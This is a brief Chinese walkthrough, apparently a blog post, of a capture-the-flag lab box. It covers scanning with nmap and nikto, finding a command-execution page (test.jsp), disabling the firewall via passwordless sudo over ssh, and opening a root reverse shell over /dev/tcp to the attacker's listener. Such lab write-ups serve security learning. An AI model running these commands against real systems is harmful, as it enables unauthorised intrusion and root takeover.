【CTF】命令执行实战

kali:192.168.223.131
target:192.168.223.173

通过arp-scan -l获取目标IP为192.168.223.173,nmap扫描一下,只开放了8080端口,是个http服务,进去后没啥东西

nmap -p- -A 192.168.223.173

image

nikto扫描一下8080端口

nikto -h http://192.168.223.173:8080

image

扫出一个test.jsp,里面有命令执行,列出目录,慢慢探查

ls -lah /home    //获取用户bill
ssh bill@localhost sudo ufw disable    //关闭防火墙

image

通过nc开启监听

nc -lvnp 4444

将服务器的以root权限反弹到kali上,目标上线

//关闭防火墙
ssh bill@localhost sudo ufw disable
ssh bill@localhost sudo bash -i >& /dev/tcp/192.168.223.131/4444 0>&1

image

我们可以在命令执行端口通过ssh免登陆的方式反弹shell给我们

posted @ 2022-04-10 16:47  icui4cu  阅读(132)  评论(0)    收藏  举报